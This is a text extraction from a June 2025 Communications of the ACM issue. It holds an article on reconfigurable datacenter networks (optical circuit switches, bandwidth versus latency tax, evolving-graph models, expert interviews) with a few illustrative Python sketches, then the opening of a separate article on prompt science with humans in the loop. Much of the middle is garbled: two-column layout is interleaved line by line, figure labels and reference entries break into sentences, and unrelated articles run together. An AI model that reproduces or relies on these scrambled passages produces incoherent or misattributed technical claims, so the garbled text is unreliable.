With the maturation of optical switching technologies, RDCNs have emerged as an innovative and attractive alternative to traditional static-topology datacenter network designs. These datacenter networks based on dynamic topologies represent a paradigm shift, standing in stark contrast to the fixed nature of state-of-the-art datacenter network topologies. In particular, reconfigurable topologies can reduce the high bandwidth tax of static networks by dynamically providing shorter paths, or even direct connections.

RDCNs are enabled by optical switching technologies, which facilitate quick changes in topological interconnections, for example, between datacenter racks. More specifically, RDCNs are often realized using OCSs: Rather than actually rewiring the datacenter, the (electrical) ToRs are connected to a set of OCSs, and at any given time each OCS provides a set of physical connections (circuits) between racks via a suitably configured matching between its ports. Figure 3a shows an example of such a setup with eight ToRs and two optical switches, each with a matching configuration between its ports that creates optical circuits between two ToRs.

The revolutionary idea underlying RDCN design is that each switch’s matching (that is, circuits) can be dynamically reconfigured by remapping the input ports to different output ports. In turn, this reconfiguration changes the physical network topology. Various technologies enable this matching reconfiguration in optical switches. For example, a topology can be reconfigured using OCSs based on micro-electromechanical systems (MEMSs).28 In a MEMS-based OCS, the optical signals are forwarded via mirrors, which can be actuated and tilted to steer each signal to the desired port (Figure 3b, top). In an alternative technology, each source ToR switch can change the frequency (wavelength, color) at which its signal is transmitted, and passive gratings are used in the OCS to direct every entering frequency/color to a different output port8 (Figure 3b, bottom). Gratings are very simple, passive building blocks with no moving parts that do not need any power. Each grating simply diffracts or routes incoming light to an output port based on its wavelength. This concept can therefore be used for physical-layer switching by equipping each node’s transceivers with tunable lasers: The wavelength (represented by color in the figure) serves as a proxy for the destination address. There are a variety of alternative
For example, a fat-tree topology requires any given time, each OCS provides a switching technologies enabling re-
configurable datacenters,16 includ-
Figure 3. An example of an RDCN. (a) A topology with eight ToR switches and two optical ing nanosecond tunable lasers,20
spine switches. Each switch is configured with a matching between its ports (violet arcs)
to create optical circuits between ToR pairs. (b) Examples of two types of reconfigurable
digital micromirror devices,13 and
optical switches that enable dynamic topologies through reconfiguration of the matching liquid-crystal-on-silicon wavelength
between ports. selective switches.31 Different tech-
nologies have different advantages,
in terms of performance or high-pre-
OCS OCS cision manufacturing requirements.
Moving
mirrors For example, liquid-crystal-on-silicon
systems can typically be packed more
Passive compactly due to the absence of mov-
gratings
ing parts. While conventional MEMS-
based beam-steering cross-connects
(a) RDCN topology with two optical circuit (b) Mirror- and frequency-
switches (OCSs) as spines based OCSs cannot provide sub-millisecond
switching functionalities for large
datacenters, alternative noncrossbar
solutions.
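The matching abstraction at the heart of this design can be sketched in a few lines of Python. This is an illustrative toy model, not code from any real OCS controller; all names are our own. Each spine OCS is represented as a mapping from input ports (source ToRs) to output ports (destination ToRs), the topology is the union of all spine matchings, and reconfiguring one matching changes the physical topology, exactly as described above:

```python
# Toy model of an optical circuit switch (OCS) as a reconfigurable matching.
# Illustrative sketch only; names and structure are hypothetical.

class OCS:
    def __init__(self, matching):
        # matching maps each input port (source ToR) to an output port (dest ToR).
        self.matching = dict(matching)

    def reconfigure(self, new_matching):
        # Remapping input ports to different output ports changes the topology.
        self.matching = dict(new_matching)

    def circuits(self):
        # The direct ToR-to-ToR circuits this switch currently provides.
        return set(self.matching.items())

def topology(tors, switches):
    # The datacenter topology is the union of all spine matchings.
    edges = set()
    for s in switches:
        edges |= s.circuits()
    return {t: sorted(dst for src, dst in edges if src == t) for t in tors}

tors = ["t0", "t1", "t2", "t3"]
s1 = OCS({"t0": "t1", "t1": "t0", "t2": "t3", "t3": "t2"})  # static matching
s2 = OCS({"t0": "t2", "t2": "t0", "t1": "t3", "t3": "t1"})  # dynamic matching

before = topology(tors, [s1, s2])
s2.reconfigure({"t0": "t3", "t3": "t0", "t1": "t2", "t2": "t1"})
after = topology(tors, [s1, s2])
# After reconfiguring s2, t0 has a direct circuit to t3 instead of t2.
```

In a real system, the reconfigure step would be implemented physically, by tilting MEMS mirrors or retuning a laser's wavelength, but the abstraction of "a new matching yields a new topology" is the same.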
are limited only at ToRs), thus removing a bottleneck.b Furthermore, such an optical infrastructure can remain unchanged even as the electrical infrastructure is upgraded incrementally and heterogeneously.

Different types of reconfigurable switches correspond to different types of RDCNs, as we will discuss in more detail in the next section. However, independent of the technology used, all such dynamic networks share a common advantage and a common disadvantage. The advantage: By providing topological shortcuts, dynamic datacenter networks can reduce the bandwidth tax, namely, the overhead incurred in multi-hop forwarding. For example, while the network diameter in Figure 2 is four, in Figure 3a, the expected route length can be as low as one, depending on the demand and the optimized topology. However, dynamic optical switching also comes at a price. In contrast to static networks, RDCNs additionally incur a latency tax; optical links are not available during reconfiguration, and reconfiguration takes time and therefore entails overhead (for example, related to buffering and throughput1,3,15). While the latency tax is inherent to dynamic topologies, its magnitude depends on the technology and architecture. For example, if the demand changes can be predicted or are known, the latency tax can be reduced by saving real-time computations; nevertheless, it cannot be completely eliminated.

b Note that electrical switches are usually also connected by fiber-optic links.

The first dimension along which possible datacenter network designs can be classified concerns whether they are static or dynamic. As discussed earlier, traditional networks are static in nature and rely on multi-hop forwarding (thus incurring a bandwidth tax), while emerging dynamic topologies can provide more direct connectivity but incur a latency tax (which depends on the frequency of topology reconfiguration). Moreover, there is a second, and, as we will see, independent dimension, along which datacenter networks can be classified: whether they are demand-oblivious or demand-aware. We therefore propose classifying datacenter designs in two dimensions: static vs. dynamic and demand-oblivious vs. demand-aware. This classification implies four main topology types, as illustrated in Figure 4a. For each of these four types, multiple realizations are possible:

˲ Static, demand-oblivious: As discussed earlier, traditional datacenter networks are based on static and demand-oblivious topologies, for example, fat-tree or expander-graph topologies.2,32,34 Recall that these networks are optimized for the worst-case traffic scenario by establishing many disjoint short paths.

˲ Static, demand-aware: Instead of the traditional worst-case optimization, static networks may also be optimized in a demand-aware manner, toward a specific and fixed workload. In this case, we assume that the demand matrix is known (or predicted) in advance. For example, Google28 recently introduced a practical and efficient slowly evolving (on the scale of days) topology for RDCNs based on demand prediction.

JUNE 2025 | VOL. 68 | NO. 6 | COMMUNICATIONS OF THE ACM 49

research and advances

Figure 4. (a) Classification of the design space along two dimensions, i) static vs. dynamic topologies and ii) demand-oblivious vs. demand-aware topologies, corresponding to four topology types. (b) Each topology type incurs different levels of bandwidth (BW) and latency (LT) taxes. (c) Different types of traffic are better served by different types of systems.
[Panel content: (a) static/slow + demand-oblivious: for example, Clos, BCube, Xpander; static/slow (evolving) + demand-aware: for example, DAN, Jupiter; dynamic + demand-oblivious: RotorNet, Opera, Sirius, Mars; dynamic + demand-aware: Helios, FireFly, ProjecToR, SplayNet, Duo. (b) BW Tax and LT Tax levels per type. (c) Traffic types: all-to-all, large flows, delay-sensitive, telemetry/aggregation.]

˲ Dynamic, demand-oblivious: Researchers started exploring highly dynamic but demand-oblivious topologies, for example, relying on rotor (or round-robin) spine switches that periodically and quickly (on the scale of nanoseconds) reconfigure the topology in a predefined and fixed manner.1,3,8,23,24

˲ Dynamic, demand-aware: Dynamic and demand-aware topologies, also called self-adjusting networks, can be reconfigured according to the current traffic pattern. Examples include Helios,10 Firefly,7 ProjecToR,13 and, recently, Cerberus,15 among others.9,13,17,30,33,35,39

How do these designs fare against each other? It turns out that the optimal architecture depends on the traffic. Traffic with a significant spatial structure (for example, a small number of elephant flows) can benefit from demand-aware network designs, while uniform traffic may be better served by demand-oblivious networks. In contrast, only dynamic and demand-aware (self-adjusting) networks can optimally adapt to the temporal structure of evolving traffic. To systematically understand the trade-offs, recall that the throughput achievable by static topologies is typically limited by the bandwidth tax, whereas dynamic topologies are subject to a latency tax. This latency tax is likely to be higher in demand-aware networks, which, in addition to physical reconfiguration, also require a more complex control plane (for example, to learn about the traffic and/or optimize for it). We illustrate this in Figure 4b. In summary, static topologies have a lower latency tax (LT Tax) than dynamic topologies, while demand-oblivious topologies have a higher bandwidth tax (BW Tax) than demand-aware topologies.

A major cause of suboptimal performance in datacenter networks is the mismatch between some common traffic patterns and the network topologies that serve them, as presented in Figure 4c. In particular, different optical topologies on the design spectrum provide different trade-offs. For example, mice flows or delay-sensitive packets should be served on a static topology; sending them on dynamic topologies that require time for reconfiguration may result in high flow-completion times and violation of their latency constraints. On the other hand, elephant flows (for example, in ML19 or data-mining applications14) will benefit from dynamic, demand-aware topologies. Since the reconfiguration time is relatively short compared with the transmission time for such large flows, the reconfiguration time cost can be amortized, and the throughput can be improved by establishing direct links between frequently communicating pairs. To give one more example, it has been shown that due to its all-to-all nature, shuffling traffic—for example, for map-reduce or all-gather collective operations in ML—can benefit from dynamic, demand-oblivious topologies that provide periodic direct connectivity between all rack pairs.8,23,24

Given these trade-offs and the desire to match different traffic types to their optimal network infrastructures, many emerging datacenter network designs are hybrid designs, supporting multiple modes of operation. We discuss some of them in the next section.

Examples of Reconfigurable Datacenter Network Designs
Reconfigurable datacenters have developed significantly in recent years, from early prototypes to initial deployments. To highlight this evolution and the spectrum of related system designs, we present some examples here.

RotorNet24 and Sirius8 are examples of demand-oblivious, periodically reconfigurable networks. RotorNet pioneered the idea of decoupling switch reconfiguration from traffic patterns. Each switch simply and independently rotates through a fixed, static set of configurations that provide uniform bandwidth between all endpoints. This approach allows for a fully decentralized control plane: The round-robin switch scheduling does not require demand estimation, schedule computation, or schedule distribution, yet delivers full bisection bandwidth for uniform traffic. To support arbitrary traffic patterns, RotorNet relies on a form of Valiant load balancing. RotorNet can accommodate a hybrid optical/electronic architecture to extend support to traffic with lower latency requirements. RotorNet has also inspired several additional demand-oblivious RDCN designs, such
as Opera23 (essentially a sequence of using the datacenter topology that best for establishing a new edge, we set the
expander graphs), Microsoft’s Sirius8 matches its requirements. Some opti- timeslot length Δ equal to the reconfig-
(providing unprecedented nanosec- cal switches are operated in a demand- uration time. Additionally, we assume
ond-granularity reconfiguration in an aware manner, creating a demand- that when a new edge e is established at
optically switched network), and Mars.1 aware topology that can best serve time t, that is, e ∈ Et and e ∉ Et−1, e cannot
To achieve very fast reconfigurations, elephant flows; some optical switches be used at time t, that is, ct (e) = 0, since
Sirius uses a combination of tunable are demand-oblivious, creating a de- this timeslot is devoted to reconfigura-
lasers and simple, passive gratings that mand-oblivious dynamic topology that tion. Note that before reconfiguration,
route light signals based on their wave- is best suited to all-to-all traffic; and yet designers will need to consider graceful
lengths. Sirius also comes with novel other optical switches create a static to- packet drain, or packet loss, or rerout-
congestion-control and time-synchro- pology that can best serve delay-sensi- ing via different paths.38 Additional re-
nization mechanisms. Google Jupi- tive short flows. strictions may also apply, for example,
ter28 is an example of a demand-aware, an inter-reconfiguration time c′ · Δ, en-
slowly evolving network, supporting in- Models of Reconfigurable suring that reconfigurations cannot oc-
cremental heterogeneity and dynamic Datacenter Networks cur too close to each other in time, for
application adaptation. Its OCSs dy- For studying and evaluating reconfigu- example, since some computation or
namically map an optical fiber input rable networks, evolving graphs25 are data collection is needed.
port to an output port through two sets a natural abstract model. In contrast Evolving graphs can also be realized
of MEMS mirrors that can be rotated in to the original evolving graph model, on the basis of a standard datacenter
two dimensions to create arbitrary port- a critical issue in our model is the re- architecture that connects ToRs. This
to-port mappings. Enabled by this OCS configuration time consumed for edge ToR-Matching-ToR (TMT) topology
layer, Google has eliminated the spine changes. In turn, this reconfigura- model, which is common in the litera-
layer from its datacenter networks, in- tion time introduces latency and can ture8,15,23,24 involves n ToR (leaf) switch-
stead connecting heterogeneous ag- influence important metrics such as es that are interconnected by a set of
gregation blocks in a direct mesh, and the throughput. Recently, Mars1 in- k optical spine switches. Each spine
therefore moving beyond fat-tree to- troduced a formal definition of peri- switch provides a n × n directed match-
pologies. odic evolving graphs in the context of ing between its input and output ports.
ProjecToR13 was the first proposal of oblivious reconfigurable networks, en- Depending on the type of spine switch
a dynamic, demand-aware datacenter abling the study of fundamental per- (or its mode of operation), the matching
network developed by Microsoft Re- formance trade-offs in these networks. within each spine switch can be static
search based on free-space optics. This The model can in fact universally cap- or can dynamically change over time, in
network design provides high scalabil- ture static, dynamic, demand-obliv- either a demand-oblivious or a demand-
ity and fan-out, enabled by dense mi- ious, and demand-aware topologies. aware manner. The current topology, Gt
cromirror devices (DMDs). The DMDs Formally, we define evolving graphs in at time t, is implemented as the union of
are placed near the ToRs and paired the following way: the k matching configurations. Figure
with mirrors fixed to the ceiling above 5a presents an example of a TMT model
the racks. Each DMD is programmed Definition 1 (Evolving Graph). with eight ToR switches, 000, 001, ... 111,
to target a specific mirror at the ceil- An evolving graph denoted by and three optical spine switches, S1, S2,
ing, guiding light to another ToR in G = (V, E ) is a sequence of directed S3, that use different matchings sched-
the datacenter. In ProjecToR, possible graphs, in which one graph is defined uling. S1 uses static matching, S2 uses
links are divided into two categories: for each timeslot t ∈ W (the set of whole demand-oblivious dynamic matching,
dedicated and opportunistic. Dedicat- numbers). The directed graph at time and S3 uses demand-aware dynamic
ed links carry small flows, possibly over t ∈ W is defined as Gt = (V, Et), where V is matching. Each ToR-spine link in the
multiple hops, and their configurations the set of n vertices and Et ⊆ V ×V is the figure represents one directed uplink
change at coarse time scales (for ex- set of directed edges at time t. Note that (to the spine switch’s input port) and
ample, daily). Opportunistic links carry an edge e ∈ V × V may appear in mul- one directed downlink (from the spine
large flows over single hops, and their tiple edge sets Et at different times t. switch’s output port). Figure 5b shows
configurations change rapidly based on The timeslot length is denoted by Δ the matching configurations used with-
current demand. [sec]. If not stated otherwise, the capac- in each spine switch at time t. These
Cerberus15 is motivated by the obser- ity of edge e ∈ Et at time t, denoted by matching configurations can overlap
vation that each existing network de- ct (e), is c for all edges and all times. (increasing the capacity of a ToR-to-ToR
sign, be it static or dynamic, demand- connection) or be disjointed. Dynamic
oblivious or demand-aware, has its Evolving graphs can be restricted to switches can change their matching
own specific advantages. In particular, specific families of graphs, for example, configurations over time. Figure 5c il-
different optical topologies provide where for every t, Gt is a degree-d bound- lustrates the topology of the evolving
different trade-offs, and the design ed graph or a r-regular graph, or where graph at time t, Gt. The set of nodes V is
used should depend on the demand. for every t, the edge set Et is periodic the ToR switches, and the set of edges
Accordingly, Cerberus is a hybrid data- with period Γ, that is, Et+Γ = Et (Γ-periodic Et is the union of the edges in the three
center network design that maximizes graphs). matchings. Using these matchings,
throughput by serving each traffic class To capture the reconfiguration time some special topologies can be cre-
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 51
research and advances
Figure 5. A 3-regular evolving graph with eight nodes implemented in a ToR–matching–ToR (TMT) network example with eight ToR
switches and three optical spine switches: One has a static matching configuration, and the other two have dynamic matching configu-
rations (one demand-oblivious and one demand-aware). Each spine switch has eight input and output ports. a) TMT architecture. b) The
matching configurations inside each of the three switches at time t. c) The resulting 3-regular topology at time t, Gt.
000
Demand-oblivious Demand-aware S1 S2 S3
Spine
100 001
S1 static S2 dynamic S3 dynamic 000 000 000 000 000 000
001 001 001 001 001 001
010
010 010 010 010 010 010
011 011 011 011 011 011
101
100 100 100 100 100 100
101 101 101 101 101 101
Leafs (ToRs)
110 011
110 110 110 110 110 110
111 111 111 111 111 111
000 001 010 011 100 101 110 111 111
ated. For example, careful readers may or even needed to adapt, for example, jecToR (https://bit.ly/3GdstQQ); UCSD
observe that the matchings of S1 and S2 the routing layer or congestion-control professor George Papen describes the
create a 2-regular De Brujin graph that mechanisms for reconfigurable data- main technologies that enable optical
has some nice properties, such as sup- center networks (see, for example, Li et circuit switches that are used in recon-
porting greedy routing; it was recently al.,21 Liang et al.,22 Mukerjee et al.,26 and figurable datacenter networks such as
used in Duo38 and Mars.1 It is important Zerwas et al.38 for early works in these RotorNet, and how different technolo-
to note that although we abstractly con- directions)? Should we maintain a fixed gies fare against each other (https://
sider k spine switches here, each imple- network layering structure, or is a cross- bit.ly/3YvaEms); and Amin Vahdat, a
menting an n × n matching, each such layer approach justified, for example, for vice president at Google, discusses the
matching configuration can be split joint topology optimization and traffic advantages and disadvantages of the
across a set of several smaller switches engineering? What are the implications different datacenter architectures, and
in practice, as in Sirius.8 of reconfigurations on, for example, why machine learning applications may
buffer management1 or the traffic pat- particularly benefit from reconfigu-
Conclusion, Challenges Ahead, tern itself? Which functionality can be rable networks (https://bit.ly/44zUADE).
and Interviews with Experts supported in software (which is more A key challenge, according to Vah-
While reconfigurable datacenter topol- flexible), and which in hardware (which dat, concerns the control system of the
ogies are an exciting vision, they are also is more complex but more performant)? reconfigurable datacenter network,
a bold one. While the first concepts and Where should we deploy the optical cir- and its scalability. He envisions that
specific technologies for reconfigurable cuit switches—is the typical assump- future, improved control systems may
datacenter topologies are being actively tion that one layer of OCSs is enough in enable a faster and more fine-grained
developed at, for example, Google, the RDCNs justified? Should optical switch- adaptation of the topology, which can
field is very young. Early deployments es connect datacenter racks or rather further improve datacenter network
are small-scale and reconfigure slowly; entire pods? What is the optimal inter- performance. If decisions have to be
however, there are developments and play between electrical packet switches made within seconds or even millisec-
efforts to support more fine-grained and optical circuit switches in future hy- onds, it can be difficult or impossible
adaptations and hence further improve brid datacenters? And what is the cost of to collect sufficient information about
network performance. Reconfigurable such architectures? And so on. the network traffic in real time, and
networks, both demand-oblivious and To answer some of these questions, generally, the control system may have
demand-aware, introduce additional we provide complementary video inter- to combine both decentralized compo-
complexities, but also bear the poten- views, in which three leading experts nents (for fast reaction and robustness)
tial to simplify certain aspects of net- share with us their perspectives on and centralized components (for global
work operations. In general, the transi- reconfigurable datacenter networks, visibility and optimization). Multiple
tion to highly dynamic topologies will the state of the art, and the challenges controllers may also be organized in a
likely be long and strenuous. ahead. hierarchical manner. By default, exist-
Operational and deployment chal- Video interviews with experts. MIT ing distributed system software is not
lenges. In terms of operational and de- professor Manya Ghobadi shares with used to exert control at such granular-
ployment challenges, we currently do us her insights on the special struc- ity. Despite these challenges, Vahdat
not have a good understanding of the ture of datacenter traffic compared emphasizes that reconfigurable data-
implications of dynamic networks from with other communication traffic, and center networks also bear a potential
the perspective of the other layers of the how this structure can be exploited in for simplifying datacenter planning and
networking stack. When is it beneficial reconfigurable networks such as Pro- operations in many aspects, for exam-
ple, by naturally supporting heteroge- the European Research Council (ERC), Implementation. USENIX (2020), 1–18.
24. Mellette, W.M. et al. Rotornet: A scalable, low-
neous network elements and therefore grant agreement no. 864228 (Adjust- complexity, optical datacenter network. In
incremental hardware upgrades. Net), as well as by the Israeli Science Proceedings of the ACM SIGCOMM 2017 Conf. on
Data Communication. ACM (2017), 267–280.
Ghobadi sees a big opportunity, but Foundation, grant ISF 2497/23. 25. Michail, O. An introduction to temporal graphs: An
also a challenge, for reconfigurable net- algorithmic perspective. Internet Mathematics 12, 4
(2016), 239–280.
works coming from ML applications. References 26. Mukerjee, M.K. et al. Adapting TCP for reconfigurable
1. Addanki, V., Avin, C., and Schmid, S. Mars: Near- datacenter networks. In 17th USENIX Symp. on
ML workloads often feature significant optimal throughput with shallow buffers in Networked Systems Design and Implementation.
temporal and spatial structure, and traf- reconfigurable datacenter networks. In Proc. ACM USENIX (2020), 651–666.
SIGMETRICS 7, 1 (2023), 1–43. 27. Namyar, P. et al. A throughput-centric view of the
fic is fairly predictable, which can sim- 2. Al-Fares, M., Loukissas, A., and Vahdat, A. A scalable, performance of datacenter topologies. In Proceedings
plify the control plane of reconfigurable commodity data center network architecture. ACM of the ACM SIGCOMM Conf. ACM (2021), 349–369.
SIGCOMM Computer Communication Rev. 38, 4 (Aug. 28. Poutievski, L. et al. Jupiter evolving: Transforming
datacenters. However, collecting and 2008), 63–74. Google’s datacenter network via optical circuit
characterizing these traffic patterns and 3. Amir, D. et al. Optimal oblivious reconfigurable switches and software-defined networking. In
networks. In Proceedings of ACM STOC. ACM (2022), Proceedings of the ACM SIGCOMM 2022 Conf. ACM
tailoring a reconfigurable network for a 1339–1352. (2022), 66–85.
4. Avin, C. et al. On the complexity of traffic traces and
very specific workload, such as distrib- implications. Proceedings of the ACM on Measurement
29. Roy, A. et al. Inside the social network’s (datacenter)
network. In Proceedings of the 2015 ACM Conf. on
uted ML, still imposes significant opera- and Analysis of Computing Systems 4, 1 (2020), 1–29. Special Interest Group on Data Communication. ACM
5. Avin, C., Mondal, K., and Schmid, S. Demand-aware
tional and research challenges. network designs of bounded degree. In 31st Intern.
(2015), 123–137.
30. Schmid, S.C. et al. SplayNet: Towards locally self-
According to Papen, dynamic to- Symp. on Distributed Computing. Schloss Dagstuhl- adjusting networks. IEEE/ACM Trans.on Networking
Leibniz-Zentrum fuer Informatik (2017).
pologies also introduce novel failure 6. Avin, C. and Schmid, S. Toward demand-aware
24, 3 (2016), 1421–1433.
31. Shakeri, A. et al. Traffic allocation strategies in
scenarios, for which current debugging networking: a theory for self-adjusting networks. WSS-based dynamic optical networks. J. of Optical
ACM SIGCOMM Computer Communication Rev. 48, 5
tools are insufficient or not applicable (2018), 31–40.
Communications and Networking 9, 4 (2017), B112–
B123.
at all. Since in large networks, failures 7. Azimi, N.H. et al. Firefly: A reconfigurable wireless 32. Singh, A. et al. Jupiter rising: A decade of Clos
data center fabric using free-space optics. ACM topologies and centralized control in Google’s
can happen frequently, detection and SIGCOMM Computer Communication Rev. 44, 4 datacenter network. ACM SIGCOMM Computer
reaction must be fast. Failure scenarios (2014), 319–330. Communication Rev. 45, 4 (2015), 183–197.
8. Ballani, H. et al. Sirius: A flat datacenter network with 33. Teh, M.Y., Wu, Z., and Bergman, K. Flexspander:
can also be technology-dependent and nanosecond optical switching. In Proceedings of the Augmenting expander networks in high-performance
generally, different technologies cur- ACM SIGCOMM 2020 Conf. ACM (2020), 782–797. systems with optical bandwidth steering. IEEE/OSA
9. Chen, K. et al. OSA: An optical switching architecture J. of Optical Communications and Networking 12, 4
rently come with different trade-offs. for data center networks with unprecedented (2020), B44–B54.
Which architecture will be most at- flexibility. IEEE/ACM Trans Netw. 22, 2 (2014), 34. Valadarsky, A. et al. Xpander: Towards optimal-
498–511. performance datacenters. In Proceedings of the 12th
tractive in terms of the performance 10. Farrington, N. Helios: A hybrid electrical/optical switch Intern. on Conf. on Emerging Networking EXperiments
architecture for modular data centers. SIGCOMM
and robustness it provides, as well as Comput. Commun. Rev. 40, 4 (Oct. 2010), 339–350.
and Technologies. ACM (2016).
35. Venkatakrishnan, S.B., Alizadeh, M., and Viswanath,
its hardware and operational costs, is 11. Figiel, A. et al. Efficient algorithms for demand- P. Costly circuits, submodular schedules and
aware networks and a connection to virtual network
currently unclear and will likely evolve embedding. In 28th Intern. Conf. on Principles of
approximate carathéodory theorems. In Proceedings
of the 2016 ACM SIGMETRICS Intern. Conf. on
over time. At least in terms of energy Distributed Systems. Schloss Dagstuhl – Leibniz- Measurement and Modeling of Computer Science.
Zentrum für Informatik (2024).
costs, optical switches are expected to 12. Foerster, K.-T. Analyzing the communication clusters
ACM (2016), 75–88.
36. Wang, W. et al. TopoOpt: Co-optimizing network
be more efficient compared with tradi- in datacenters. In Proceedings of the ACM Web Conf. topology and parallelization strategy for distributed
2023. ACM (2023), 3022–3032.
tional switches.8 13. Ghobadi, M. et al. Projector: Agile reconfigurable
training jobs. In 20th USENIX Symp. on Networked
Systems Design and Implementation. USENIX (2023),
Research challenges. Last but not least, the vision of reconfigurable datacenter networks and topology engineering also poses interesting graph-theoretical research problems. The design of self-adjusting networks is related to graph spanners and embedding problems,5,11 as well as to self-adjusting data structures.6 In a paper,5 we presented initial theoretical results, relating the average path length in a demand-aware network to the entropy of the demand. However, for many performance metrics, including throughput,1,3 we currently know very little about how they can be optimized algorithmically in datacenter networks with controlled topologies.
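As a toy illustration of the quantity involved in that entropy result (a sketch only, not the paper's formal bound), the empirical entropy of a normalized source-destination demand distribution can be computed as follows; the demand values here are made up:

```python
import math

def demand_entropy(demands):
    """Empirical entropy H(D) of a source-destination demand distribution.

    `demands` maps (src, dst) pairs to traffic volumes. The entropy of the
    normalized distribution is the quantity that the average path length of
    a demand-aware network is related to: skewed (low-entropy) demand
    admits shorter expected paths than uniform (high-entropy) demand.
    """
    total = sum(demands.values())
    probs = [v / total for v in demands.values() if v > 0]
    return -sum(p * math.log2(p) for p in probs)

# Skewed demand: a few heavy pairs -> low entropy.
skewed = {("a", "b"): 90, ("a", "c"): 5, ("d", "e"): 5}
# Uniform demand over the same pairs -> maximal entropy for 3 outcomes.
uniform = {("a", "b"): 1, ("a", "c"): 1, ("d", "e"): 1}

print(demand_entropy(skewed))   # well below log2(3)
print(demand_entropy(uniform))  # log2(3) ≈ 1.585
```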
Acknowledgments
We would like to thank our interviewees Manya, Amin, and George, and all our co-authors and students working with us on self-adjusting networks over the last years. Research supported by …

References
… data center interconnect. In Proceedings of the ACM SIGCOMM Conf. ACM (2016), 216–229.
14. Greenberg, A. et al. VL2: A scalable and flexible data center network. In Proceedings of the ACM SIGCOMM 2009 Conf. on Data Communication. ACM (2009), 51–62.
15. Griner, C. et al. Cerberus: The power of choices in datacenter topology design—a throughput perspective. Proceedings of the ACM on Measurement and Analysis of Computing Systems 5, 3 (2021), 1–33.
16. Hall, M.N. et al. A survey of reconfigurable optical networks. Optical Switching and Networking 41 (2021), 100621.
17. Kandula, S., Padhye, J., and Bahl, P. Flyways to de-congest data center networks. In Proceedings of the ACM Workshop on Hot Topics in Networks. ACM (2009).
18. Kandula, S. et al. The nature of data center traffic: Measurements & analysis. In Proceedings of the 9th ACM Internet Measurement Conf. ACM (2009), 202–208.
19. Khani, M. et al. SiP-ML: High-bandwidth optical network interconnects for machine learning training. In Proceedings of the 2021 ACM SIGCOMM Conf. ACM (2021), 657–675.
20. Lange, A. et al. Sub-nanosecond optical switching using chip-based soliton microcombs. In Optical Fiber Communication Conf. The Optical Society (2020).
21. Li, J. et al. Uniform-cost multi-path routing for reconfigurable data center networks. In Proceedings of the ACM SIGCOMM 2024 Conf. ACM (2024), 433–448.
22. Liang, C. et al. Negotiator: Towards a simple yet effective on-demand reconfigurable datacenter network. In Proceedings of the ACM SIGCOMM 2024 Conf. ACM (2024), 415–432.
23. Mellette, W.M. et al. Expanding across time to deliver bandwidth efficiency and low latency. In 17th USENIX Symp. on Networked Systems Design and Implementation. …
… 739–767.
37. Xiao, W. et al. Gandiva: Introspective cluster scheduling for deep learning. In 13th USENIX Symp. on Operating Systems Design and Implementation. USENIX (2018), 595–610.
38. Zerwas, J. et al. Duo: A high-throughput reconfigurable datacenter network using local routing and control. Proceedings of the ACM on Measurement and Analysis of Computing Systems 7, 1 (2023).
39. Zhou, X. et al. Mirror mirror on the ceiling: Flexible wireless links for data centers. ACM SIGCOMM Comput. Commun. Rev. 42, 4 (2012), 443–454.

Chen Avin ([email protected]) is a professor in the School of Electrical and Computer Engineering at Ben Gurion University of the Negev, Israel.

Stefan Schmid is a professor in the Faculty of Electrical Engineering and Computer Science at the Technical University Berlin, Germany.

This work is licensed under a Creative Commons Attribution International 4.0 License.
© 2025 Copyright held by the owner/author(s).

Watch the authors discuss this work in the exclusive Communications video: https://cacm.acm.org/videos/datacenter-networks

JUNE 2025 | VOL. 68 | NO. 6 | COMMUNICATIONS OF THE ACM
research and advances

DOI:10.1145/3709599

From Prompt Engineering to Prompt Science with Humans in the Loop

Can prompt engineering be made more reliable, verifiable, and generalizable?

BY CHIRAG SHAH

key insights
˽ LLMs are increasingly being used in scientific research, but their application often involves ad hoc decisions that can affect research quality. Forcing LLMs to produce desired results through prompt adjustments in an unscientific manner may lead to unverified and harmful outcomes.
˽ We could use humans in this process, but overreliance on them may defeat the purpose of using LLMs as a strategic tool. A new method shows how humans and LLMs can work in collaboration, bringing verifiability and trustworthiness as well as objectivity and scalability to data analysis.
˽ The method, demonstrated here through two applications, includes rigorous labeling, deliberation, and documentation steps to reduce subjectivity.

IN RECENT YEARS, as the sophistication and capabilities of large language models (LLMs) have grown, so have the tasks for which they're applicable, going beyond information extraction and synthesis15 to include analysis, content creation, and reasoning.8 Unsurprisingly, many researchers find them useful for research tasks, such as identifying relevant papers,19 synthesizing literature reviews,3 writing proposals,11 and analyzing data.31 They have also been found effective for investigative tasks, such as drug discovery.35 There is growing concern, however, that a large portion of this success hinges on prompt engineering, which is often an ad hoc method of revising the prompts fed into an LLM to achieve a desired response or analysis.24

Unfortunately, using prompt engineering for scientific research is dangerous. At best, there is the possibility of creating a feedback loop with a self-fulfilling prophecy. At worst, researchers may be overfitting hypotheses to data, leading to untrustworthy claims and findings. In most cases, overreliance on prompt engineering can lead to unexplainable, unverifiable, and less generalizable outcomes,6,25,27,37 lacking a scientific approach.

We consider a scientific approach to be one that is well-documented and transparent, verifiable, repeatable, and free of individual biases and subjectivity. Most prompt-engineering techniques violate at least one of these principles. While such ad hocness can be bad in most situations, it is especially problematic when it comes to scientific research, which demands a certain level of rigor. Thus, if we want to continue harnessing the power of LLMs, we need to do so in a responsible manner and with enough scientific rigor.
Here, we focus on research areas and applications in which an LLM is used for labeling text data, such as identifying user tasks or intents, extracting sentiments, and deriving issues from user reports. Building on an LLM's ability to summarize or synthesize data, many recent research projects have deployed them for these tasks.24,31 There are also efforts to use LLMs for generating datasets and benchmarks,20,34 which could be foundations for future research. Therefore, it is paramount that outcomes from LLMs are thoroughly validated and proven trustworthy.

In this article, we demonstrate how to do this by creating a verifiable and replicable method of prompt science that aids in prompt engineering. Specifically, we take inspiration from the rich literature and methods of qualitative coding to employ a human in the loop for verifying responses from LLMs and systematically constructing prompts. While not a universal solution for all prompt-engineering situations, this approach is nonetheless applicable to many scenarios involving human- or machine-generated annotations.

Prompt Engineering Prospects and Problems
LLMs are built on a transformer architecture that contains encoder and decoder modules, and are trained on large corpora of text data. What an LLM generates depends heavily on the inner workings of this architecture as well as the training data. Most users and researchers do not have the ability to directly change that architecture or the training process. They can, however, apply various techniques such as fine-tuning,10,12 prompt engineering,33 and retrieval-augmented generation (RAG)39 to shape the outputs as they desire.

